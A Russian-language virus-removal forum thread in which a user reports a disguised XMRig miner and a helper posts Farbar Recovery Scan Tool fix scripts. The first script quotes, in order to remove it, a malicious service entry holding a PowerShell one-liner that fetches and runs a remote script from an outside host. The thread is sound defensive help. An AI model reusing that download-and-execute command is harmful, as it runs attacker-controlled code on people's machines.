Перейти к содержанию
Правила раздела

Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m

ewixis

Автор ewixis
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

ewixis Новичок

ewixis

Опубликовано
Опубликовано (изменено)

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

 

Касперский и докторвеб - ничего не находят
 Farbar Recovery Scan Tool
показал следущее

Addition.txt FRST.txt

Изменено пользователем ewixis
Ссылка на комментарий
Поделиться на другие сайты
  • ewixis изменил название на Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1221974024-4211864995-550959383-1001\...\Run: [AMDNoiseSuppression] => "C:\Windows\system32\AMD\ANR\AMDNoiseSuppression.exe" (Нет файла)
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 MicrosoftConsole; cmd.exe /c powershell.exe irm \"$(irm hxxps://uggsboots.ca/domain)/script?id=MzC5mRi0yY&tag=HWIDSpoofer\" ^| iex [X] <==== ВНИМАНИЕ
File: C:\ProgramData\RuntimeBroker.exe
File: C:\ProgramData\fontdrvhost.exe
FirewallRules: [TCP Query User{2D4AF635-8E99-4B99-B13E-52DF22106299}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{5A86FE62-BC0C-424C-B4D4-2B34520C0D83}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{F5DA0C92-AF5B-4043-A03E-475253806968}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{62A1EF4B-1479-4DB8-AD83-50DC7F2BF843}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{B003717D-8F91-4BBA-952B-FA55A304FEA1}] => (Block) C:\Program Files\BorisFX\ContinuumAE\13\utilities\bfx-version-update\bfx-version-update.exe => Нет файла
FirewallRules: [{858B83CD-9DD2-45F8-8E08-5638F7C78090}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{46670F30-615C-49C3-B504-8E9A944AB6D2}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{AC143033-55F5-4302-BFDB-EDC9D82B15F9}] => (Allow) C:\Program Files\Red Giant\Services\Red Giant Service.exe => Нет файла
FirewallRules: [{589AB3E0-0316-4B13-869A-227AB8866435}] => (Allow) C:\Program Files\Maxon\Tools\mxredirect.exe => Нет файла
AlternateDataStreams: C:\ProgramData:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData:DNS [40]
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\Users\All Users:2c21b77e [1262]
AlternateDataStreams: C:\Users\All Users:DNS [40]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\Все пользователи:2c21b77e [1262]
AlternateDataStreams: C:\Users\Все пользователи:DNS [40]
AlternateDataStreams: C:\Users\Все пользователи:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData\Application Data:DNS [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhioihinfh [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjiiiio [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`vovtfe.qpsu.obnfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk:F20EF51E1F [3442]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [8202]
AlternateDataStreams: C:\Users\UserNC\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\Application Data:DNS [40]
AlternateDataStreams: C:\Users\UserNC\Application Data:NT [40]
AlternateDataStreams: C:\Users\UserNC\Downloads\jjsploit_8.14.3_x64_en-US.msi:MBAM.Zone.Identifier [180]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:DNS [40]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\UserNC\Documents\GTA San Andreas User Files:2c21b77e [1262]
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано
2 часа назад, ewixis сказал:

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

Защитник справился сам, файлов на компьютере нет.


1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Detections.log"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\quick\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\resource\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\system\*.*"
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • lestapa
      Trojan:Win64/DisguisedXMRigMiner и SettingsModifier:Win32/PossibleHostsFileHijack
      Автор lestapa
      Windows Defender обнаружил 2 проблемы и не удаляет.
      Обнаружено: Trojan:Win64/DisguisedXMRigMiner
      Состояние: сбой карантина
      и 
      Обнаружено: SettingsModifier:Win32/PossibleHostsFileHijack
      Состояние: отказано.
      Др Веб ничего не нашел.
      Что делать?
       
       Сделал проверку Farbar Recovery Scan Tool, как было сказано в другой теме по этому майнеру.
      FRST.txt Addition.txt
    • DonorRaboti
      [РЕШЕНО] Подозрение на троян Trojan:Win32/Wacatac.B!ml
      Автор DonorRaboti
      Добрый день, по своей глупости скачал файл exe и запустил его после чего на компьютере появились рекламные ярлыки на рабочем столе и как будто часть сайтов с антивирусным по затормозились. Сканировал Dr.Web CureIt и KVRT, но ничего не было найдено того, что ранее не видел. Возможно, видел новый созданный профиль в Windows, подписанный как неизвестный или что-то такое и удалил его. Проверки Антивирусами ничего не выявляли, кроме пары файлов в корзине. Сам компьютер, как мне показалось, иногда подвисал, словно был загружен, но в диспетчере задач, как и в resmon ничего не выявил. На VirusTotal при проверке файла указывало на вредоносное ПО, содержащее Trojan:Win32/Wacatac.B!ml. Также заметил, что не могу попасть на сайт safezone.cc, скачивал автологер через 2 зеркало
      CollectionLog-2025.06.19-02.13.zip
    • Alexey82
      [РЕШЕНО] Прошу помощи с удалением Trojan:Win32/Kepavll!rfn
      Автор Alexey82
      Добрый день.
      Прошу помощи в удалении Trojan:Win32/Kepavll!rfn.
       
      Сработал стандартный Защитник Windows (Windows 10) Microsoft Defender.
      В папке ProgramData появилось много папок с названиями всех известных антивирусов, при попытке открыть страницы в браузере с упоминанием о удалении троянов - браузер закрывается.
      Прогнал CureIt, нашел угрозы, удалил не всё, лог приложил.
      Объясню сразу момент - приложение GPP Remote Service установлено мной лично для доступа к домашнему ноуту.
      Собственно все началось после того, как захотел ознакомиться с игрой Wizardum, как ни странно скачивал торрент отсюда (h__s://bуrutgаmе.оrg/41154-wizоrdum.htmI), в момент запуска установщика, на него выругался Microsoft Defender.
       
      Прошу помощи с удалением.
       
      Заранее спасибо откликнувшимся специалистам.
      CollectionLog-2025.06.27-06.20.zip cureit.rar
    • leon4324
      Trojan:Win32/Wacatac.B!ml
      Автор leon4324
      скачал с сайта какого то кряк на вегас про 17, виндовс дефендер сразу начал ругаться кинул угрозу о том что появился троян Trojan:Win32/Wacatac.B!ml и дальше посыпалось открывание смд и повер шелов, сразу кинул на удаление трояна, посыпалось куча других. закрывал браузер и была какая то белая иконка в диспечере   сейчас он грузит это   дк вб присылает это, я не знаю че делать


      так же это приложение которое 6fk висит в диспечере
      вот логи
    • aronone
      [РЕШЕНО] Нашел вирус Trojan:Win32/Dorv.A
      Автор aronone
      Здравствуйте, защитник виндовс нашел Trojan:Win32/Dorv.A , и еще PUABundler:Win32/uTorrent_BundleInstaller и PUADlManager:Win32/OfferCore , поместил в карантин и заблокировал, после проверил куррейтом и ничего не находит. Просьба помочь почистить пк. Вирус появился сразу после подключения к общему гостиничному вай фай, может быть это как то связанно
      cureit.zip CollectionLog-2024.11.30-15.34.zip
×
×
  • Создать...